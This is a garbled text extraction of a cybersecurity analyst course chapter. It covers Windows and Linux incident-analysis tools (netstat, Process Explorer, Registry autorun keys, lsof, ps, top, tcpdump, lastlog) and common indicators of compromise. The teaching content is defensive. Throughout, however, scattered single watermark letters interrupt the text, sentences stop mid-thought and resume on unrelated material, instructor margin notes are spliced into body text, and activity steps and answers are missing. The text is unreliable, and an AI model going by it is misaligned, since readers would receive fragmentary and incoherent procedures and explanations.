net This command enables you to manage various network resources. For
analysis purposes, net view and net use are the most relevant
o
e
a sinkhole to capture information. Even if requests don't time out, an
unknown node along a path could be acting as a man in the middle,
ut
eavesdropping on traffic as it traverses the network. This command
comes with Windows.
ib
arp This command enables you to view and manipulate the system's ARP
cache. To view the cache on all interfaces, you need to use the -a flag,
but you can also get more granular and specify which interface you want
tr
with the -N flag. Analyzing the system's ARP cache is a more direct way
than Wireshark of detecting multiple IP addresses resolving to the same
is
MAC address (in other words, ARP poisoning). This command comes
with Windows.
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 9-1
Analyzing Incidents with Windows-Based Tools
Data Files
e
C:\CNX0013Data\Performing Active Asset and Network Analysis\putty.exe
ut
C:\CNX0013Data\Performing Active Asset and Network Analysis\ProcessExplorer\procexp.exe
Activity: Analyzing
Before You Begin Incidents with Windows-
ib
Based Tools
You'll be using your Windows 10 client for this activity. You'll be using the Windows-based Secure
Shell (SSH) client PuTTY to open a shell onto your server. You'll also run Process Explorer, a tool
tr
that does not come with Windows but is available for download from Microsoft's website.
is
Scenario
In your domain, you monitor the security of Develetech's Windows 10 workstations. These
D
computers are under constant threat of compromise through malware and other malicious activity.
Therefore, you need to use the tools at your disposal to more easily detect an incident when it
occurs.
or
First, you'll retrieve networking information using ipconfig to get a more accurate picture of how
the workstations communicate. You'll examine how sessions like SSH connections can be
monitored using the netstat command.
e
Then, you'll take a more detailed look at the running processes on your workstations using Process
Explorer. Process Explorer can reveal much about a process's behavior, including how it interfaces
at
are using the Windows architecture. Using these various Windows-based tools will ensure your user
workstations are continuously monitored for incidents.
up
2. How would you renew a Dynamic Host Configuration Protocol (DHCP) lease
on your Ethernet adapter?
N
e
ut
ib
tr
Ensure students leave
is
this prompt open for the 4. What is the default gateway for your Ethernet adapter?
next step.
A: 10.39.5.1
The answer to this
D
question will need to
change if your 5. What is the DNS address for your Ethernet adapter?
classroom network is A: 10.39.5.#, where # is the student's Windows Server IP address.
different than what's
detailed in the course
setup. 6.
Server .
®
or
Initiate an SSH session from your Windows 10 client to your Windows
e
a) From the course data files, open putty.exe.
at
b) In the Host Name (or IP address) field, type your Windows Server's IP address.
c) Verify the SSH radio button is selected and select Open.
d) In the PuTTY Security Alert dialog box, select Accept to trust the connection.
lic
e
ut
ib
tr
10.What does the status show for that connection?
is
A: ESTABLISHED
D
11.Examine how netstat lists a recently closed SSH session.
a) Switch back to your PuTTY connection and enter exit to close the session.
b) Return to the netstat list.
or
c) Enter netstat -n and note the state of the connection with a foreign port of 22 (SSH).
e
at
lic
up
The state of the connection is now TIME_WAIT. This indicates the connection has been closed by
the local host, but it is still sending and receiving any packets that may have been delayed. The
D
c) Verify that you can see the various processes running on your Windows 10 system. entry.
o
D
d) In the Process Explorer window, from the menu, select View→Show Lower Pane.
e
ut
ib
tr
is
D
or
e
at
processes.
N
o
D
c) In Process Explorer, in the VirusTotal column, select the number link to open the file's page on
VirusTotal.
d) Verify that some of the anti-malware solutions tracked by VirusTotal consider this malware.
e) Select the DETAILS tab, then scroll down to the File Version Information section.
f) Scroll down, and under the File Version Information section, verify that the Obscura executable is
not signed.
e
ut
ib
tr
is
D
or
e
at
The file is not actually malicious, but it does exhibit unusual behavior. It's a good idea to remove it,
lic
d) Look for the key value with the Registry path HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run.
e
ut
ib
tr
is
Note: If necessary, sort by Type and focus on Key entries.
D
e) Double-click the key and then copy it from the Name text box.
f) Select OK to close the dialog box.
15.View or
the key's details in the Windows Registry.
a) Select the Windows 10 Start button and type regedit
e
b) Select Registry Editor from the results.
c) In the Registry Editor window, in the address bar, replace the existing text and paste the key path
at
you copied.
lic
up
D
ot
e) Verify that this key includes several values, including a path to the obscura.exe file. This Registry
key is used to automatically start processes when the system starts, so that means the unknown
process will continue to run even after restarting the server.
e
ut
ib
f) Right-click the obscura entry in the Registry and select Delete.
tr
g) Select Yes to confirm.
h) Close Registry Editor.
is
i) Wait about 10 seconds and look for the Obscura.txt file to appear on the desktop.
j) Open the file and verify that it says the Obscura process was revealed.
D
k) Return to Process Explorer, right-click obscura.exe, and select Kill Process. Select OK to confirm.
l) Verify that the obscura.exe entry disappears from Process Explorer.
m) Delete Obscura.txt from the desktop.
16.How could these tools help you discover and deal with malware?or
A: Answers will vary. The netstat command can enable you to find any open or recently closed
network connections that are either malicious or being used in an insecure way. Process Explorer
e
enables you to find suspicious processes and see how they interface with system DLLs and the
Windows Registry. Registry Editor enables you to further identify a suspicious program's
at
configuration details, including any changes to the less visible components of the operating
system. With any tool, you need a good working knowledge of Windows' normal operation to
lic
TOPIC B
Analyze Incidents with Linux-Based Tools
Just like with Windows, some analysis tools target Linux distributions specifically. Some tools are
even cross-platform. In this topic, you'll use both in a Linux environment.
e
File System Analysis Tools for Linux
ut
File System Analysis Linux comes with several tools to aid in analyzing a file system. One such tool is lsof, which
Tools for Linux retrieves a list of all files currently open on the OS. This can be everything from a regular text file
ib
open in a text editor to a network socket, and much more. Basically, any resource that is currently
active will be displayed when using the lsof command. Although the output of lsof can be
customized, it typically provides for each file:
tr
• The process ID for the process that has the file open.
is
• The owner of the process.
• The size of the file.
D
• The file's local or network address.
• The file's TCP state, if applicable.
• The file's access mode.
or
The power of lsof for file analysis is that you can quickly get a list of all resources a process is
currently using, which can come in handy in identifying malicious processes that are using too many
resources or resources they should not have access to. You can also go the other way and identify
e
malicious resources that are using specific processes. If you have a file name or process ID that you
want to look for specifically, you can also tell lsof to retrieve just those results. For example, if you
at
want to retrieve all files open by the root user that are being used by process ID 533, you'd enter
lsof -u root -a -p 533. In this case, the -a option creates an AND operator.
lic
up
D
ot
N
Figure 9-8: Using lsof to display open files for a particular process and user.
Aside from live analysis of a Linux file system, you may need to make a secure copy in order to
o
preserve the integrity of the file system. The dd command in Linux enables you to make full copies
D
of individual files or entire drives. If you copy individual files, you can retain their file format like
any standard copy operation; if you copy entire drives or partitions, you can clone them by creating
a drive image, like an ISO. The syntax of a standard copy using dd is as follows:
dd if=/dev/sr1/ of=drive-image.iso
A more recent fork of dd is dcfldd, which provides additional features like multiple output files and
exact match verification.
e
to others using charts and graphs. Some Linux distributions that use the Gnome desktop come with
Disk Usage Analyzer, formerly named Baobab, which also depicts file and folder sizes in both a list
ut
and graphical format. For KDE environments, a similar tool called Filelight is available.
ib
Like on Windows, Linux processes are an instance of an application that is currently running. A Process Analysis Tools
tr
basic command for listing current processes is ps. To get a full list of all running processes for all for Linux
users, use the -A option. The command comes with options to specify output formatting, but the
is
default output behavior retrieves the process ID, the TTY (which terminal executed the process),
the execution time of the process, and the name of the process itself. You can filter the results by
these fields—for example, to find the process ID of cron, you'd enter ps -C cron. You can also
D
sort results by piping in the sort command—for example, to find the processes that are resulting in
the most CPU overhead, you can enter ps -A | sort -k 3 to sort by column 3 (execution time).
or
Using the ps command is a quick and simple way to query the OS to identify any process-related
anomalies. An unknown or dubious process may indicate the host is compromised, especially if it's
consuming a great deal of processing time.
A static list provided by ps can be useful, but what if you want to monitor processes in real time,
e
rather than executing the command every few seconds? The top command does just that. It creates
at
a scrollable table of each and every running process, and it is constantly refreshed so you see the
most up-to-date statistics. The default information provided by the table includes the process ID,
user, percentage of CPU being used, percentage of memory being used, execution time, and more
lic
the command is running to sort the table by CPU usage. Monitoring the real-time CPU usage of
running processes is an effective way to compare a computer's execution overhead with another
baseline environment. If the CPU usage of certain processes, or all processes as a whole, far exceed
D
e
ut
Figure 9-9: The top command sorting the real-time process table by CPU usage.
ib
Malware Analysis Tools for Linux
tr
Malware Analysis Tools Malware doesn't target Linux to the same degree as Windows, so there aren't many worthwhile end-
is
for Linux user anti-malware solutions out there. However, you can still use Linux tools to analyze malicious
software.
D
For example, you can use strings to retrieve the executable's strings in a static analysis, or you can
use a tool like grep to search and filter for text data embedded in an executable. There are also
many disassemblers available for Linux, including the GNU Debugger (GDB) and a Unix-like
or
version of IDA. The U.S. National Security Agency (NSA) also developed and released a cross-
platform reverse engineering tool called Ghidra as open source software in 2019.
As far as sandboxing malware goes, you can use one of several Linux-based virtualization platforms,
including QEMU and Kernel-Based Virtual Machine (KVM). There are also versions of VirtualBox
e
and VMware available for Unix-like systems.
at
lic
up
D
ot
N
o
D
Figure 9-10: Using the strings command to search for Registry-related strings in an executable
file.
e
• The total memory available.
ut
• The total memory being used.
• The total memory going unused.
• The amount of memory used by temporary files.
ib
• The amount of memory used by kernel buffers and the page cache.
• The amount of estimated memory available for new processes, taking into account the page
tr
cache.
is
Note: Like many Linux tools, you can use the -h switch with free to make the output more
human readable.
D
or
Figure 9-11: Displaying a system's memory usage with the free command.
e
at
While free does not enable you to analyze a system's memory bit for bit, its high-level overview of
memory usage can help you troubleshoot slow system performance, a potential symptom of
malware compromise. Consider using free in tandem with top to confirm both excessive CPU and
lic
memory usage when you suspect an incident may be causing the system to freeze, crash, or
otherwise operate non-responsively.
up
machine. As part of persistence and other post-attack processes, attackers may leave rogue accounts
running on a system. Depending on these accounts' access rights, the attacker could use them to
further compromise the system or its other users, or it could be using the system as a launching
ot
point from which to continue moving laterally throughout the network. Whatever the case may be,
monitoring for suspicious logged-in entities can alert you to malicious behavior.
Linux distributions come with a few built-in session management tools for quick and easy access to
N
this information. In fact, there are three commands that perform approximately the same function,
with a few key differences: who, w, and rwho.
o
The who command, by default, shows what user accounts are logged in, what TTYs they have active
for each running process, and what date/time they logged in. The w command displays the same
D
basic information, but also returns the remote host (if applicable), how long the account has been
idle, the names of processes the account is actively running, the execution time of each process, and
more. You can filter the results by account name (e.g., w root). Lastly, rwho runs on a client/server
architecture—a host runs the rwhod server, and the client runs the rwho -a command to retrieve
active account information for all hosts on the local network. The output of rwho is similar to who.
Figure 9-12: The w command revealing an unknown account (hjkla) logged in from a remote
machine (10.39.5.10).
e
The lastlog Command
ut
Even if you don't catch a rogue account when it's logged in, you can still retrieve login history from
the /var/log/lastlog file using the lastlog command. This command will list the account name,
ib
TTY, remote host (if applicable), and the last time the user logged in. You can also filter these
results by more than n days old (-b) and less than n days old (-t). Attackers may not allow their
rogue accounts to stick around precisely because they fear active monitoring; so, even after they've
tr
quickly entered and left a system, you can still detect the traces of their intrusion with lastlog.
is
Network Analysis Tools for Linux
D
Network Analysis Tools The following table lists some of the network analysis tools available for Linux. Depending on the
for Linux distribution you use, some of these tools may not be installed by default.
Tool
Wireshark or
How It Applies to Network Analysis
iPerf This is also a cross-platform tool that offers the same basic functionality.
D
e
policy rules, neigh for retrieving the ARP cache, and many more.
ut
Note: The ip command is intended to replace the deprecated
ifconfig command, which is still available on many Linux
distributions.
ib
netstat Again, this tool is essentially the same as with Windows, but it tends to be
more verbose in its default settings. The format of some of the options
tr
also differs, so ensure that you review its manual page beforehand. A
newer command meant to replace netstat on Linux is ss, which can
is
query the kernel directly and therefore provide a quicker response. It can
also display more statistics about TCP sockets and connection states than
D
netstat.
traceroute This is essentially the same as Windows' tracert. The main difference is
that, on Windows, tracert uses ICMP echos, whereas traceroute on
or
Linux uses UDP datagrams over ports 33434 and 33435. This may end
up failing if the firewall blocks higher-number UDP ports. Most
implementations of traceroute do have an option to use ICMP echo
requests instead.
e
arp Like its Windows counterpart, this tool displays the system's ARP cache.
at
The default behavior in Linux is to display the cache for all available
interfaces.
lic
up
D
ot
N
o
D
ACTIVITY 9-2
Analyzing Incidents with Linux-Based Tools
e
You'll be using your Kali Linux VM for this activity.
ut
Activity: Analyzing
Incidents with Linux- Scenario
Based Tools
Although many of the servers and workstations that Develetech runs are Windows-based, even
ib
more are run on the Linux platform. It's your job to monitor these servers for malicious activity.
First, you'll start by analyzing each system's network interface for any suspicious configurations.
tr
Next, you'll look at a live feed of the processes running on your systems to detect any anomalous or
unwanted behavior. Lastly, you'll examine the network communications between your Linux
systems so you may identify malicious traffic.
is
Because you cannot ensure each and every Linux system has Wireshark installed (or should waste
resources installing it), you'll use the leaner tcpdump command-line tool built into most Linux
D
distributions. Using these various Linux-based tools will ensure your main server infrastructure is
being continuously monitored for incidents.
1.
or
Manipulate your Kali Linux VM's network interfaces.
a) On your Kali Linux VM, open a terminal.
e
b) At the terminal, enter ip a
at
c) Verify the names and addresses of the main interfaces. The eth0 interface is the main interface that
the VM communicates with. The docker0 interface is the network interface for Docker containers.
The lo interface is the loopback interface that defines the localhost address (127.0.0.1).
lic
interface to 512?
A: sudo ip link set eth0 mtu 512
ot
3. Enter the command you came up with in the previous step. Enter ip a to
verify your changes, and then reset the MTU to 1500.
N
A: Answers may vary. If any of the interfaces on a host are not configured properly when compared
to their baseline, this could indicate a compromise. Settings like the IP address, MTU, and MAC
D
address could be altered by an attacker to intercept communications or turn the host into a botnet
zombie under some remote server's control. Abnormal packet transmission totals or excessive
packet loss errors could indicate likewise.
The a flag selects all processes with a terminal. The u flag shows the user or owner of the process.
The x flag adds onto the a flag by also showing processes that do not have a terminal.
b) Verify that you can see a static list of processes, including information about each process's user,
CPU usage, memory usage, start date and time, command, and more.
e
ut
ib
tr
The screenshots of the
5. Retrieve a real-time list of running processes on the system. ps and top commands
is
may not exactly match
a) At the prompt, enter top
what students see.
b) Verify that you can see a continually updating table of processes.
D
or
e
at
lic
up
D
d) Verify that Firefox ESR now shows up as a process from the top command, and that you can see
its CPU and memory usage.
e
ut
ib
tr
e) Start other applications like the file manager (Thunar), Mousepad, Metasploit, and more. Examine
how each one affects CPU and memory usage.
is
Note: The Metasploit process is listed as ruby, as this is the programming
language that Metasploit and its scripts are written in.
D
f) Press q or Ctrl+C to terminate the top program.
6.
or
How might you use the top command to detect malicious activity?
A: Answers may vary, but one of the most common ways to detect malicious activity is by watching
the memory and CPU usage of processes running on the system. You may be able to spot
e
suspicious processes that are taking up too many resources.
at
You'll be capturing on the eth0 interface, but you could also capture on all interfaces by not
specifying one.
b) Enter sudo tcpdump -i eth0
up
Start another live capture, this time saving the data to a file.
ot
8.
a) At the terminal, enter sudo tcpdump -w /home/kali/Desktop/capture1.pcap -i eth0
The -w flag saves the capture information as a .pcap file for later examination using tcpdump or
N
Wireshark.
b) Generate more traffic by pinging the domains again.
If traceroute isn't c) Enter traceroute google.com and verify that you can see the various hops along the route to
o
d) Return to the tcpdump command prompt and press Ctrl+C to end the capture.
e
9. Compare using tcpdump and Wireshark to analyze a packet capture. doesn't visually appear
on the desktop, have
ut
a) Double-click the capture1.pcap file on the desktop to open it in Wireshark.
students open Wireshark
b) Verify that you can see your capture in Wireshark. and then open the
packet capture file from
ib
there.
tr
is
D
or
e
c) Return to a terminal and enter tcpdump -r /home/kali/Desktop/capture1.pcap
at
The -r flag tells tcpdump to open a capture from a file and display it in the terminal.
10.Note the difference between how tcpdump and Wireshark display packet
lic
contents.
What other Linux tools and commands could you use to search the capture if
up
TOPIC C
Analyze Indicators of Compromise
Now that you know the tools and techniques of active analysis, you can begin to apply them to
situations that may show signs of an attack. In this topic, you'll take a closer look at these situations
so you can make more informed decisions about how to respond.
e
ut
Indicators of Compromise (IOCs)
Indicators of Indicators of compromise (IOCs) are any residual sign that an asset or network has been
ib
Compromise (IOCs) successfully attacked or is continuing to be attacked. IOCs can be definite and objectively
identifiable, like malware signatures, but many IOCs require subjective judgment calls based on the
analyst's experience and knowledge of organizational systems. Because these IOCs are often
tr
identified through anomalies rather than overt incidents, they can be open to interpretation.
Therefore, it's important, whenever possible, to correlate multiple situations together to produce a
is
more complete and accurate narrative of events, and to help you avoid false positives and other
common analysis pitfalls. Still, you may find that all you have to go on are individual, isolated IOCs
D
—these are the ones that require the most focused and careful analysis.
As there are many different targets and vectors of an attack, so too are there many different
potential IOCs. The following is a list of some of the most common or major IOCs that you may
encounter:
• Unauthorized software and files.
• Suspicious emails.
or
e
• Suspicious Registry entries.
at
• Rogue hardware.
• Suspicious or unauthorized account usage.
up
IOC Tools
There are tools that can help you identify IOCs. Likewise, the OpenIOC framework provides a
standardized format for defining new IOCs as the threat landscape evolves. For example, FireEye
D
provides IOC Finder for collecting host data and detecting the presence of IOCs; IOC writer for
creating definitions in the OpenIOC format; and IOC Editor for managing IOC data. You can also
share IOC data with other cybersecurity professionals using community-driven threat intelligence
ot
Threat Hunting
Threat Hunting Threat hunting, also called hunt teaming, is a technique that facilitates detection of anomalous
o
and/or malicious behavior. Instead of passively monitoring entities and systems, a team of security
personnel will actively "hunt" for indicators of compromise in a particular environment. This is
D
based on the assumption that you may already be compromised, even if you don't notice any overt
signs of an incident. A hunt team will typically examine hosts and network activity for evidence of
command and control (C&C) channels used in a botnet; unusual Registry keys that could indicate
persistent malware; rogue hardware that is attached to the network; and more.
e
out what it does and how you can contain and eliminate it.
ut
A more subtle software-based IOC involves the presence of attack tools on a system. If an analyst
or an automated monitoring system detects, for instance, High Orbit Ion Cannon (HOIC) or some
other distributed denial of service (DDoS) application on an end user's workstation, it may suggest
ib
an insider threat. However, an external attacker may be using this host as a staging point for more
attacks without the user's knowledge. Either way, the key thing to look out for is the presence of
attack tools in suspicious contexts. It makes sense for a penetration tester to have this tool on their
tr
system, but not an employee from the Accounting department. Keep in mind that the term "attack
tools" is often a matter of the person's intent—the same tools, after all, may be used by security
is
personnel to defend the network.
Unauthorized software doesn't always have to mean overt malware. Clever attackers can make
D
modifications to existing files to facilitate their attack. For example, a hosts file is a perfectly normal
file to see on a client machine. However, an attacker can modify this file to initiate a pharming
attack, and all of a sudden the legitimate file is being used in a malicious way. Occasionally, attackers
or
or malware will leave behind suspicious files during or after an attack. The suspicious file may
indicate advanced persistent threat (APT) activity, or may simply be carelessness and a failure to
properly cover one's tracks; for example, a Trojan may install a rootkit via some innocuous-looking
file, but then forget to clean up Registry entries for the Trojan after the rootkit is installed. Host
e
intrusion detection systems (HIDSs) are specifically designed to monitor changes to important files
at
e
ut
ib
tr
is
D
or
e
at
lic
IOCs in Startup
up
Malware often thrives in an environment when it's able to immediately start running even after a
user has restarted the operating system. Otherwise, the malware would likely require some additional
direct action on the user's part to stay active. Therefore, malware usually injects itself into the startup
D
list of an operating system. Depending on the OS, you can analyze the startup menu for any
programs that either appear malicious or that you can't verify. Tools like the Startup tab in
Windows Task Manager will provide only an incomplete list, so consider using a tool like Autoruns
ot
IOCs in Patches
N
While many patches are designed to fix security issues, some introduce new vulnerabilities or break
existing security integration and functionality. Unauthorized patching of operating systems and
o
software to specific versions can indicate an attempt by an attacker to create an opening for their
attack. In doing so, they can create the guise of having engaged in proper security behavior.
D
IOCs in Metadata
The signs of an attack may also be present in file system metadata rather than the content of files
themselves. For example, the last modified date of a file might be something absurd like 01-01-1900
if the attacker was careless in their attempt to cover their tracks. Or, the indication may be more
subtle, like a last modified date on a weekend when no one should have access to the system.
Besides dates, other metadata like the account that created the file, the size of the file, the length and
encoding information of media like videos, what location a photo was taken in, etc., are all potential
IOCs.
e
scan systems for traces of deleted files, you may find evidence that an attack has taken place.
ut
Suspicious Emails
ib
Spam and phishing emails are very common, especially when their target is personnel who oversee Suspicious Emails
major business operations. Management in your organization will likely be targeted frequently by
tr
attackers looking to steal high-level credentials. Although most email-based social engineering
attempts don't indicate compromise if the target is well trained on how to spot and reject such
attempts, there are certain situations where they actually can be IOCs.
is
For example, an insider threat may be in contact with someone on the outside, providing them with
confidential information. The insider threat either has access or gains access to a customer account
D
database that stores personally identifiable information (PII) and banking information. They then
send some of this information via an email body or attachment to their contact on the outside so the
contact doesn't need to break into the network themselves. If you monitor email transmissions for
or
specific keywords, phrases, or file contents, you may come across an IOC when you start seeing
outbound transmissions that include strings of credit card numbers. Information like this is almost
never communicated over email, and should raise a red flag. You can then verify the employee has
e
access to the customer account database, and whether or not the flagged information is in the
database. This can help you determine if the employee's credentials are compromised, if the database
at
is compromised, or both.
It's not just outbound email that can be an IOC. For example, an employee receives an email from
lic
their manager's account that asks them to share confidential information. The message is
uncharacteristic of the manager, being typed poorly and rife with spelling and grammatical errors.
On the surface, this may seem like a standard phishing attempt, but the fact it appears to be sent by
up
the real account may imply something more. Although email sources can be spoofed, you check the
email server and verify the very same email message was sent from the manager's account to the
recipient employee. Now the threat is more serious, as it appears the manager's account has been
hijacked and is being used for malicious purposes.
D
ot
N
o
D
Figure 9-14: A suspicious email sent from a legitimate source, indicating that Jack Price's account
may have been hijacked.
e
headers match known malicious values.
ut
Potential IOCs in an email header include:
• The IP address listed in the Received: from field.
• The Simple Mail Transfer Protocol (SMTP) HELO value, which identifies the sending machine.
ib
• The Received: by field, which lists the chain of computers that sent and received the email until
it reached its destination.
tr
If any of these fields list an IP address or name you recognize as malicious, or fail to recognize as
legitimate, you might have a spoofed message on your hands. The following screenshot highlights
is
suspicious values that indicate a spoofing tool was used to send the email in the previous figure.
D
or
e
at
lic
up
D
Figure 9-15: Suspicious values indicate a spoofing tool was used to send the email.
Note: Keep in mind that even email headers can be spoofed, so you may be subject to false
ot
negatives.
N
Entries certain Registry entries are more common targets than others. The autorun entries in the Registry
are often targeted because they're not always visible to the average user. In modern Windows
D
systems, there are two types of autorun keys: Run, which initializes its values every time a user logs
in, and RunOnce, which initializes its values on the next user log in, whereupon the key is removed
from the Registry so it does not run again. Examine both to reveal any unknown or suspicious
values that shouldn't be there. More specifically, these keys are located in:
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Note: Older versions of Windows may also have RunServices and RunServicesOnce entries.
e
ut
ib
tr
is
Figure 9-16: A suspicious key in the Registry's Run entry.
D
Another common tactic for malware is to change file associations in the Registry, especially the
association of executable and shell-type files like EXEs, BATs, COMs, CMDs, and more. A user
or
double-clicks a file with any of these extensions, expecting it to open in a certain program, but
instead it's opened by rogue software that further compromises the computer. File extension
Registry entries are located in HKEY_CLASSES_ROOT (HKCR), which merges the file
extension entries in HKLM and HKCU\SOFTWARE\Classes.
e
Malware can also modify Registry entries that work with the system's running drivers and services.
at
An unrecognizable entry, or an entry with suspicious key data, may indicate the malicious software is
running stealthily in the background to avoid detection. These Registry entries are found in HKLM
\SYSTEM\CurrentControlSet\Services.
lic
Note: It's best to edit the Registry while Windows is loaded in Safe Mode to prevent unwanted
applications from starting automatically.
up
When it comes to TCP/UDP ports, some malware has been known to use certain ports, but Unknown Port and
unfortunately there's no definitive or comprehensive list. Malware writers easily adapt and change Protocol Usage
how their software communicates, which is why many administrators implement a whitelist at the Ensure students
ot
firewall. Still, certain ranges of ports are more likely to indicate a compromise. The dynamic and understand the different
private range (49152–65535) can't be registered with the Internet Assigned Numbers Authority ports used in each side
(IANA) and is typically used by protocols for temporary communication sessions. If an unknown of a connection. The
N
open port in this range appears constant on a host, it may indicate a channel that's carrying server port is usually in
the well-known range
malicious traffic.
(0–1023), but the client
o
Still, even the range of registered ports (1024–49151) is used for malicious communications. port is usually in the
Although an unknown protocol could clash with the protocol that's actually registered, chances are ephemeral range (1024–
D
the host isn't necessarily using the registered protocol. So, malware could initiate a connection over a 65535).
registered port without any conflict. For example, Internet Relay Chat (IRC) is registered on port
6660, but the W32.Spybot.OBZ worm has been known to launch DDoS attacks on this port.
e
ut
ib
Figure 9-17: Using netstat to enumerate network sockets. Notice that the host is listening on
several ports within the dynamic and private range.
tr
Although open ports in the well-known range (0–1023) can still carry malware, their being open
won't necessarily be an IOC. Your organization will need to keep ports 80 and 443 open, for
is
example, despite the threat of worms and other malicious software. So it then falls to you to analyze
how the main protocols are used. Assume that you have a File Transfer Protocol (FTP) server set up
D
with transport encryption (FTPS) for remote employees to both upload and download files.
Naturally, ports 989 and 990 will be open on the FTP server itself. But you also notice that some of
the back-end servers in your organization are communicating over FTPS, despite the fact they have
or
no reason to. This unexpected outbound communication could indicate the legitimate FTPS
protocol is being used maliciously to move sensitive data to the FTPS server where it can be
exfiltrated by a remote client.
e
Note: You can look up suspicious ports on https://www.speedguide.net/ports.php to see if
that port is known to be used for malicious purposes.
at
Excessive Bandwidth At some point, you or your team should create a baseline for network performance. Although the
Usage bandwidth usage of your network may fluctuate from day to day, it will usually hover around the
up
same range. If that range is exceeded in a small period of time (e.g., a few seconds), or even if you
notice an increasing trend over a larger period of time (e.g., a few weeks), it could indicate that a
malicious user or service is using your network in unauthorized ways.
D
When it comes to malware, worms consume bandwidth more than just about any other type. Their
purpose is to spread through network channels fairly quickly, and even if their payload is small, their
rapid propagation could congest the entire network. The other type of malware that impacts
ot
bandwidth substantially is a bot infection. If attackers have compromised hosts in your network by
turning them into zombies for a larger botnet, they could be sending massive amounts of traffic to
external hosts as part of a DDoS attack. In either case, users may experience lag or other latency
N
issues when they attempt to access a network share or a resource on the Internet. Likewise, your
automated network monitoring tools should detect unusual traffic spikes and generate an alert when
that traffic usage crosses a certain threshold.
o
Bandwidth-related IOCs don't always point to malware, however. If your network is experiencing
D
bandwidth issues, it may be the target of an ongoing DDoS attack from either internal or external
hosts. These attacks are noticeable because they often target public-facing resources like web servers
to deny service not just to the organization, but to its customers as well. So it becomes easier to
determine whether a bandwidth-related IOC is an actual compromise when you consider both the
source and the destination of the excessive traffic.
e
ut
ib
tr
is
Figure 9-18: Using iPerf to measure network bandwidth usage.
D
Service Disruption and Defacement
or
Excessive bandwidth usage will accompany most service disruption, but this isn't always the case.
Attackers can take down servers by gaining control over them, not just by flooding them with
network traffic. For example, an attacker who is able to move laterally to a domain controller (DC)
Service Disruption and
Defacement
e
by exploiting a golden ticket may be able to shut down the Active Directory service, which could
cause authentication to fail for users accessing other services in the network. The attacker could also
at
move to individual servers and cut them off from the wider network. If your administrators usually
tunnel into an application server using Secure Shell (SSH), and now find that their connections are
being interrupted or denied, it could indicate that an attacker was able to stop the SSH service on
lic
the application server. Keep in mind that service disruption is difficult to diagnose, and is often
mistakenly thought to be an IOC when it may in fact be a maintenance issue.
One of the most overt and definite signs of a compromise is when a service like a website is
up
defaced. Attackers may exploit Structured Query Language (SQL) injection weaknesses or gain
control of the web server itself to alter the site's presentation. Most defacements aren't very subtle,
as the attacker usually wants their work to be recognized. So, the site will often stand out to even
D
those that have never visited it—this may include simplistic text and a background with eye-catching
colors; text that taunts the organization or its users; graffiti on legitimate images; irrelevant or
foreign images that identify the attacker's affiliation or political beliefs; and scripts or links that inject
ot
malware onto a visitor's computer. Some defacement attacks are more subtle, however, and may
simply sneak in an ironic modification of text or an image that isn't easily noticeable. These types of
defacement attacks are meant to confuse users into believing that the organization is responsible for
N
e
ut
ib
tr
is
D
or
Figure 9-19: In one of the most well-known incidents, a group of attackers defaced the
promotion site for the 1995 film "Hackers."
e
at
Note: Other than disruption and defacement being IOCs themselves, some IOCs like a change
to a server configuration at an unusual time can indicate a disruption and/or defacement attack.
lic
Rogue Hardware
up
Rogue Hardware Rogue hardware is any unauthorized piece of electronic equipment attached to a network or assets
in an organization. A Universal Serial Bus (USB) thumb drive may be attached to a web server to
siphon sensitive data. An extra network interface controller (NIC) may be installed on an employee's
workstation to create a side channel for an attack. An employee's personal smartphone may be
D
connected to the network, exposing the network to malware. A new MAC address might appear on
the network used as an attack platform. These situations could indicate a compromise, but much of
that determination will depend on your existing security policies and the context of the situation.
ot
Ultimately, truly rogue hardware is designed to exploit organizations' tendencies to secure their
logical infrastructure while neglecting their physical one.
N
One of the most common types of rogue hardware is a rogue wireless access point (WAP). Anyone
with access to your network can create a WAP, even from a non-specialized device like a laptop.
They can intentionally mislead others into connecting to their rogue access point (called an evil
o
twin), which then opens the door for a man-in-the-middle attack on unsuspecting users. The signs
of a rogue WAP may include unknown or unidentifiable service set identifiers (SSIDs) showing up
D
within range of the office; lost or malformed traffic within the network; and devices appearing in the
building that are unaccounted for.
Rogue hardware is a major reason why you should have an inventory of all devices in your
organization.
e
services they should not be authorized to access. For example, a user with limited privileges may
ut
be signed in to a domain controller. Only administrators should have access to the DC, so this
could indicate unauthorized privilege escalation and compromise of the server.
• Failed logins: When you check access logs, you'll eventually get used to the sight of failed
ib
logins. After all, users forget or mistype their passwords all the time. However, repeated failures
for one account may suggest more than just benign attempts, especially for administrator
accounts. Attackers who try brute-force password cracking will go through hundreds, maybe
tr
thousands of attempts if there are no failure limits set on the system.
• New accounts: Instead of attempting to crack an existing account, an attacker may be able to
is
create new accounts in a system. You should already be monitoring account creation carefully,
especially in a domain environment where only certain administrators should be able to create
D
them. Although a new standard user account may indicate a compromise, it is new administrator
accounts that you need to pay special attention to. An attacker with their own high-level
permissions can cause serious damage.
or
• Guest account usage: In most cases, you should be disabling the guest account on your
systems. However, some systems may slip by, so be sure to monitor your login events for
instances of the guest account. While guest accounts don't have many privileges, they can enable
an attacker to log on to a domain they do not otherwise have access to.
e
• Off hours usage: Depending on the normal work period in your organization, seeing an account
at
being used during off hours may indicate an attacker attempting to catch the organization
unaware. For example, if your employees work 9:00 a.m. to 5:00 p.m., and the account for one of
those employees signs in to the virtual private network (VPN) at 3:00 a.m., the account may have
lic
address range assigned to the United States, and then minutes later that same account logs in
from an IP address range assigned to the United Kingdom, then you have suspicious behavior
on your hands. The practice of validating whether or not certain account behavior is possible
given the speed of current travel technology is known as geo-velocity.
D
Additional IOCs
ot
The following is a list of additional behaviors that could be indicators of compromise: Additional IOCs
• Scan sweeps across the network: An attacker may be attempting to perform reconnaissance
N
on the network and its hosts. An IDS or a similar system will detect these scans and alert you to
suspicious behavior, assuming the system is calibrated correctly.
o
• Unusual network traffic that could indicate internal hosts are communicating with a
command and control (C&C) operation: A bot may beacon its C&C server by sending simple
D
• Unexpected output from applications: Assuming you have a baseline for known behavior in
your applications, you may start to see their behavior deviate from the norm. This could be a
symptom of unauthorized changes made to the application by an attacker, or it could suggest the
presence of malware on the host system.
• Memory overflows and other application-crashing errors: One denial of service (DoS) attack
method is to cause an application to overrun its memory buffer to trigger an execution failure.
